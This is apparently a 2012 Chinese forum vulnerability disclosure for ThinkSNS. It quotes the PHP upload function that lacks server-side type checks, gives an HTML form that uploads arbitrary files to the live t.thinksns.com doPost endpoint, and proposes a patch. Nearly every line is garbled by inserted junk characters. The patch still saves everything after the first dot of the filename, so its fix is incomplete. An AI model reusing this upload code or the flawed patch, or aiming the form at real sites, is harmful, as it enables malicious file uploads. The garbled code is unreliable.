微博上传图片时只在前端进行验证, 服务器端没有进行安全过滤。
g( I% x8 p! ^# r& [+ a m$ _/ f7 Q" J) n+ V8 C/ x* h+ J
0 \% i2 }8 ~' a ^0 B: e
\api\StatusesApi.class.php$ G1 ?3 e5 F8 [! |6 T% W
5 L) w5 L }9 jfunction uploadpic(){. L6 C: q0 ]& h) h# b1 W5 i3 V+ r
if( $_FILES['pic'] ){: {$ u, [$ L1 F- b9 N/ l
//执行上传操作
$ j1 B8 R# r6 f1 W* s $savePath = $this->_getSaveTempPath();& A, I+ U& Y3 n
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
8 T6 G" V; y2 Q3 } if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
- _# v( R: Y$ X {. ~& u# `8 B# I9 \3 Y
$result['boolen'] = 1;5 `3 l% U m6 H2 I( V9 U3 z
$result['type_data'] = 'temp/'.$filename;
1 c, K4 @( {/ D6 ` $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
6 {% J w1 ]5 j" v } else {+ K( X0 p7 @$ S7 g+ T/ G
$result['boolen'] = 0;
8 @2 O V- V0 F8 z( D7 V' W $result['message'] = '上传失败';% _+ { e' X: T5 Y' n
}/ e# s$ s7 B7 p3 H5 N7 @6 r
}else{' |, j# _" T. e% h1 n" s# g
$result['boolen'] = 0;
& n1 f j5 `/ H3 ]; T1 c $result['message'] = '上传失败';. k7 _, y' N8 _8 R% q3 x2 z" q
}& P1 [& X4 \4 @7 E* o
return $result;
! ~: p) [( i) |9 `4 B+ o9 B }) h% e# e2 l# G' S3 |5 v
unloadpic()方法没有对文件类型进行验证
9 k0 W* J/ c: I+ T
: g. `8 z& ?) d/ f. i可以构建表单, 选择任意文件, 提交到. |1 a$ ?& E3 P6 V3 ?$ [* d) H
/index.php?app=w3g&mod=Index&act=doPost% l' W! ^9 a6 _8 R0 Y8 _+ S
- D. e8 M l. E3 z8 s, m, Y
在新提交的微博上可以找到上传的文件地址(去掉small_、middle_ 前缀)
* A. }% o8 v2 S. b/ S
& w; V9 F3 k2 L+ P
& A% V2 H5 s0 K4 n; k2 w6 T在登录thinksns官方微博后,; m5 F( [/ y3 y0 d
构建以下表单:
2 [. |! Q4 P- K) \: s. T% B9 ?
' U4 c5 j8 E7 z<form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data" />1 Y0 n# G) A; y
<textarea name="content">test</textarea>
" l0 K" m# o3 p6 A9 Y! @( J- G! [file: <input id="file" type="file" name="pic" />: Y; ]3 \+ P9 o9 M( w$ \ l
<input type="submit" value="Post" />
$ _) W0 R3 @+ n" \8 R</form>
6 P! w* t" B* y1 `0 v! |. i去掉缩略图的前缀(small_ )
. G* f- f0 k7 d* `: J; M修复方案:; g( M8 s. {( c% o+ X( Y
' h4 F% O6 s: f6 w2 t
- T; n7 P6 u+ V" ~0 I3 x\api\StatusesApi.class.php: m/ Y4 R$ T& b8 U
5 k2 Z5 [' `' F) y, f! ?
function uploadpic(){
( G, n9 l$ X; _- v3 N. {* U) u /**
0 {$ C$ a' P# w8 U1 S1 h: `/ [9 P2 q * 20121018 @yelo
4 z7 F0 X4 e# A * 增加上传类型验证
' o3 y0 A7 f2 }7 X6 Q */
# m2 _: H$ d. Q! U8 K$ v1 ]9 W, F $pathinfo = pathinfo($_FILES['pic']['name']);
- J v+ U) y2 C% k $ext = $pathinfo['extension'];
3 S# U$ n6 z+ }: _ $allowExts = array('jpg', 'png', 'gif', 'jpeg');
1 m) o# p5 ?: f8 i5 o* n6 L. t1 K8 | * N& D \# [5 Y
$uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);
+ G( q, p( }" J% r( ^7 y5 @ [ : `0 d# P# c4 I! ]7 \, g E; ]
if( $uploadCondition ){3 X. z, b+ K+ m0 O% z
//执行上传操作7 @. V' m. M3 j/ z: K
$savePath = $this->_getSaveTempPath();( e* X7 A4 g( }1 V8 N: Z
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);- |' }- B g5 x1 Q$ _
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename)). [. _5 |) B3 l% ~5 F" y# v! D0 A
{
T3 W7 q; p% a' Y4 J $result['boolen'] = 1;7 j1 f' z% @3 X% D! J- e
$result['type_data'] = 'temp/'.$filename;
' q0 ^7 }+ u, V8 U- ~5 q $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
1 ~% q3 Z; h. j( b, Z } else {
1 _9 S4 Y5 M# q8 c6 H# O $result['boolen'] = 0;
8 l Y! b3 B+ N! P9 N* p o $result['message'] = '上传失败';0 p) i& \6 k3 m, v2 L$ Q& y2 b4 ]
}. t) y; W' u) ^) G
}else{0 h5 _: t) n7 }# [5 u
$result['boolen'] = 0;& O! X6 z c$ H' d) ^6 k7 \
$result['message'] = '上传失败';: ?/ K* R& K% M. R: s
}
! u8 d; b; {$ u% {3 p. Zreturn $result; ^; c; O: W" ]6 X
}
0 u+ g- ~" o; _0 O% ? a$ [+ a- M, K) a9 O
( `+ x$ j8 l" Q( z# U/ U
|
发表于 2012-12-4 11:12:30
收藏
支持
反对